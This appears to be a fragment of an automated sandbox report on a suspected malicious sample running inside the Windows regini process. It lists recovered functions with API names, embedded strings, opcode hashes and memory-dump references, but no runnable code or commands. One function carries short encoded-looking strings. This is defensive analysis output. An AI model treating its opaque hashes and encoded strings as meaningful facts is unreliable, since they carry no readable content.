                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: f35c0bb0e5c2be9d201f2d5a3767015d53e8d38ac539a827b4e54993e6d9bddc
                                                                  • Instruction ID: 3feedcfb57173b6994c7688939266aca32c695c945cd7ea1fea1ec1e5530efd7
                                                                  • Opcode Fuzzy Hash: f35c0bb0e5c2be9d201f2d5a3767015d53e8d38ac539a827b4e54993e6d9bddc
                                                                  • Instruction Fuzzy Hash: 06E092752102087BD610EF59DC41FDB3BACEFC5750F008408FA08A7241C731B9108BB8
                                                                  Function 00928690 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 009286BC
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: cbce35480b63f5581e3c40cdf66e398078c0d1383abfb7c38fdf9a54aebfa23b
                                                                  • Instruction ID: 9d3bc88cd949ed22e7a12c1831790b26d2e3c1f18d901edce0793e5fa66ba566
                                                                  • Opcode Fuzzy Hash: cbce35480b63f5581e3c40cdf66e398078c0d1383abfb7c38fdf9a54aebfa23b
                                                                  • Instruction Fuzzy Hash: B1E0867164130427FB246AF8EC4EF67336C9B48724F584A60B91CDB2E5ED7AF9014650
                                                                  Function 00928477 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00922060,009381DF,0093589E,00922023), ref: 009284B3
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID:
                                                                  • API String ID: 2340568224-0
                                                                  • Opcode ID: cb4f1fa0d927d0eb332dcaf108405a43969d706698edad673ee7f3d7385422b0
                                                                  • Instruction ID: 7b6735874e0548d40e9c97d43675117ad62890d7ccfe7d60f14a63a268792496
                                                                  • Opcode Fuzzy Hash: cb4f1fa0d927d0eb332dcaf108405a43969d706698edad673ee7f3d7385422b0
                                                                  • Instruction Fuzzy Hash: CFE08631A453057EF750ABF49C47FDA27689B50390F044164B90DE61C6D969A4014B64
                                                                  Function 00928480 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00922060,009381DF,0093589E,00922023), ref: 009284B3
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID:
                                                                  • API String ID: 2340568224-0
                                                                  • Opcode ID: 5238db62bc8800101cee1923c7fb97072102e5e94c967eb6a009a61a8d4a7eea
                                                                  • Instruction ID: 8c717246d063e421c81eb39defc42044e384dba038a41d01962346b7d4859c3d
                                                                  • Opcode Fuzzy Hash: 5238db62bc8800101cee1923c7fb97072102e5e94c967eb6a009a61a8d4a7eea
                                                                  • Instruction Fuzzy Hash: E3D05E71B843053BF610AAE5DC47F56328CDB40794F058064BA0CE62C2ED69F4004AA5
                                                                  Function 034B2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: f8bd4a485c48c4be966262467c18d3a9d825c856396b4a5221e574323f930a43
                                                                  • Instruction ID: 4e0f1f094cb89e9123f1d6150244fb1466b96778da771d06ef18c49d8e2ee9b7
                                                                  • Opcode Fuzzy Hash: f8bd4a485c48c4be966262467c18d3a9d825c856396b4a5221e574323f930a43
                                                                  • Instruction Fuzzy Hash: 15B09B719015C5C5DA51E76046087177A14A7D0701F19C467D3030A51E477AC5D1E179

                                                                  Non-executed Functions

                                                                  Function 032704D8 Relevance: .1, Instructions: 146COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096333258.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3270000_regini.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1f9faf44fc0a719ac5b8e1a663f872bc8667cff6f9682d8c059a1ae62bdb77ea
                                                                  • Instruction ID: 32011951eea91c291e30642b0b819149f71b90bf2a8bbc2d55c7cc9e1116cef1
                                                                  • Opcode Fuzzy Hash: 1f9faf44fc0a719ac5b8e1a663f872bc8667cff6f9682d8c059a1ae62bdb77ea
                                                                  • Instruction Fuzzy Hash: E841D775A28B0E4FD368EF6C9081677F3E5FB45300F50462DD98AC7252EAB4E8868785
                                                                  Function 0327DDF9 Relevance: 56.5, Strings: 45, Instructions: 214COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096333258.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3270000_regini.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                  • API String ID: 0-3558027158
                                                                  • Opcode ID: c50c5d711aa7f104fbc7c5df85f1a820149106898c39f028a156850a945b5dcf
                                                                  • Instruction ID: a279b05d3db7e77c57fb8ad4e24f9a574ea7ef92ca0e56dd3e2310c7e5735d1d
                                                                  • Opcode Fuzzy Hash: c50c5d711aa7f104fbc7c5df85f1a820149106898c39f028a156850a945b5dcf
                                                                  • Instruction Fuzzy Hash: C59160F04082988AC7158F54A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB95
                                                                  Function 034B2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  • Opcode ID: e9e277d5495fa188ff20c927066463c416e65e1d1df3c0517dc64f5f07479f49
                                                                  • Instruction ID: 2416635085e277dc77df989bf8b7d7ba955f5f7295ce6bf5094789e21c7b77ce
                                                                  • Opcode Fuzzy Hash: e9e277d5495fa188ff20c927066463c416e65e1d1df3c0517dc64f5f07479f49
                                                                  • Instruction Fuzzy Hash: 4F51B7B5B00156AFCB10DF9988909BFF7B8BB09201714866BE479DF641D374DE418BE8
                                                                  Function 03522410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  • Opcode ID: 8b945f2d8ddb24a3004e61fb72dae348514d4390c406e23b652b079ad7e30d28
                                                                  • Instruction ID: 1ab991193e2bbf7d946fb67510af21819c160cbee69817585ae3473cfbe6edcf
                                                                  • Opcode Fuzzy Hash: 8b945f2d8ddb24a3004e61fb72dae348514d4390c406e23b652b079ad7e30d28
                                                                  • Instruction Fuzzy Hash: FA51067DB00655AFCBB0DE5CD89087EBBF9BB45200F04CC5AE495CB691E774DA4087A0
                                                                  Function 03273BD1 Relevance: 15.0, Strings: 12, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096333258.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3270000_regini.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %218$%8>3$/xfn$24<8$;;6x$bygw$effe$lw%!$mfny$wcye$xegf$yg
                                                                  • API String ID: 0-3778452520
                                                                  • Opcode ID: b8098ad5589fbc7e239b4a2717ba39d0daa2bfdd868c68bf2637d3505216b232
                                                                  • Instruction ID: b8280434ddca10fd517c8c517c31f11573aa37bacc1d2c75ff679dd186586740
                                                                  • Opcode Fuzzy Hash: b8098ad5589fbc7e239b4a2717ba39d0daa2bfdd868c68bf2637d3505216b232
                                                                  • Instruction Fuzzy Hash: 2E112574C15A4CDADB04DF98E9866DDBB70FB05304FA49198D015AB296C7750A42CF86
                                                                  Function 034A7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 034E4742
                                                                  • Execute=1, xrefs: 034E4713
                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 034E4725
                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 034E4787
                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 034E46FC
                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 034E4655
                                                                  • ExecuteOptions, xrefs: 034E46A0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                  • API String ID: 0-484625025
                                                                  • Opcode ID: d24c0d05c1f7e013dc3f5f04fc18aeda1faeb6dcd06235298a3281ef3fa77b69
                                                                  • Instruction ID: d1fb4d8780a5c7c80727159453ca4d007696ba893a077c2140cffd616874cc82
                                                                  • Opcode Fuzzy Hash: d24c0d05c1f7e013dc3f5f04fc18aeda1faeb6dcd06235298a3281ef3fa77b69
                                                                  • Instruction Fuzzy Hash: CE513A35A007086EDF30EBE9DC85FEE7BB8AF14311F14009BE505AF291D771AA468B58
                                                                  Function 034BB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-$0$0
                                                                  • API String ID: 1302938615-699404926
                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                  • Instruction ID: d1d19df44044535abd488662f5e62c329b1709a7ea886ca85dcbe415a6f0c15e
                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                  • Instruction Fuzzy Hash: 6E818D74E052499FDF24CE68C8917EEBBB5EF45310F1C425BD861AF390C63498518B79
                                                                  Function 035220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: %%%u$[$]:%u
                                                                  • API String ID: 48624451-2819853543
                                                                  • Opcode ID: 0bd9aa61b4e5e2b234afa82e0996b67dc675f0b1c4b4020bb5d08c3c613c70b4
                                                                  • Instruction ID: b16d8454fefaae02954f34e458d948970b742d56975bb3a60a4746ab330355f9
                                                                  • Opcode Fuzzy Hash: 0bd9aa61b4e5e2b234afa82e0996b67dc675f0b1c4b4020bb5d08c3c613c70b4
                                                                  • Instruction Fuzzy Hash: 0F21627AE00269AFDB50DF79DC40EEEBBF8EF55640F08052AE905E7250E730D9018BA5
                                                                  Function 0349F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RTL: Re-Waiting, xrefs: 034E031E
                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 034E02BD
                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 034E02E7
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                  • API String ID: 0-2474120054
                                                                  • Opcode ID: cd2819a308796c215f0fbc3184b46db527859319bffbb55a7fe475f5d99afea7
                                                                  • Instruction ID: f3099020f2c154557cd8812cd842129122e31b8d5bb7f639d7ead3d61d664ba8
                                                                  • Opcode Fuzzy Hash: cd2819a308796c215f0fbc3184b46db527859319bffbb55a7fe475f5d99afea7
                                                                  • Instruction Fuzzy Hash: 36E19C346047419FEB24CF29C884B6ABBE4BB84315F180A5FE4A5CF3A1D774D849CB5A
                                                                  Function 034ABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RTL: Resource at %p, xrefs: 034E7B8E
                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 034E7B7F
                                                                  • RTL: Re-Waiting, xrefs: 034E7BAC
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 0-871070163
                                                                  • Opcode ID: 130a72467ddb7c44ca0611f59bd204d3340127b593b249e19dbcb3191219e2d2
                                                                  • Instruction ID: 604a9ae067737a263636f64dda4ef304363a5b4745f4ed751581a73093f3b4b9
                                                                  • Opcode Fuzzy Hash: 130a72467ddb7c44ca0611f59bd204d3340127b593b249e19dbcb3191219e2d2
                                                                  • Instruction Fuzzy Hash: 8F41B135700B029FC724CE29D840B6BB7E5EB98721F180A1EF956DF780DB71E4058B99
                                                                  Function 034AB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 034E728C
                                                                  Strings
                                                                  • RTL: Resource at %p, xrefs: 034E72A3
                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 034E7294
                                                                  • RTL: Re-Waiting, xrefs: 034E72C1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 885266447-605551621
                                                                  • Opcode ID: c868ee3eab3a3063e2cfd84db7e3494c1bd7b8f1629ee1b492a08490dd73d53b
                                                                  • Instruction ID: 8339d60782337f2962741eaf6830637efb840d0fa560d94b03e926bbcfde229e
                                                                  • Opcode Fuzzy Hash: c868ee3eab3a3063e2cfd84db7e3494c1bd7b8f1629ee1b492a08490dd73d53b
                                                                  • Instruction Fuzzy Hash: 6A41D035700706AFD720DE29CC41B6ABBA5FF94721F18061AF965AF380DB21F84687D9
                                                                  Function 03522300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: %%%u$]:%u
                                                                  • API String ID: 48624451-3050659472
                                                                  • Opcode ID: eda3626db076eac441f05f54b23113d3c4efca52e571e97ac1d45c0c5ccad86b
                                                                  • Instruction ID: bce8f4a8ffc0c5f36e2701bfd2546778eb961dd28174cd2c9693d950d8e0406f
                                                                  • Opcode Fuzzy Hash: eda3626db076eac441f05f54b23113d3c4efca52e571e97ac1d45c0c5ccad86b
                                                                  • Instruction Fuzzy Hash: FB318B7A6002299FCB60DF29DC40FEEB7F8FF55610F44455AE849D7150EB30DA458B60
                                                                  Function 034B7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-
                                                                  • API String ID: 1302938615-2137968064
                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                  • Instruction ID: 378ebb6496e8c7c83ffb21e73a6e39bd093d49bce70348641ea5b52725e8a27e
                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                  • Instruction Fuzzy Hash: 44915F70E0021A9EDB24DE69C8816FFBBB9AF84760F18455BE865AF3C0D7309941877C
                                                                  Function 03479126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $$@
                                                                  • API String ID: 0-1194432280
                                                                  • Opcode ID: fef70794548f147d8c1b16424c7b13911845b19c66c52eec9ea646da03ae2325
                                                                  • Instruction ID: 174f6b707ec6e80024b65d7601224fbaeb2ccceb92b54f19c0add2f019d77ca6
                                                                  • Opcode Fuzzy Hash: fef70794548f147d8c1b16424c7b13911845b19c66c52eec9ea646da03ae2325
                                                                  • Instruction Fuzzy Hash: D7816975D002699BDB31DB54CC54BEEB6B8AB08710F0441EBE919BB250E7709E81CFA8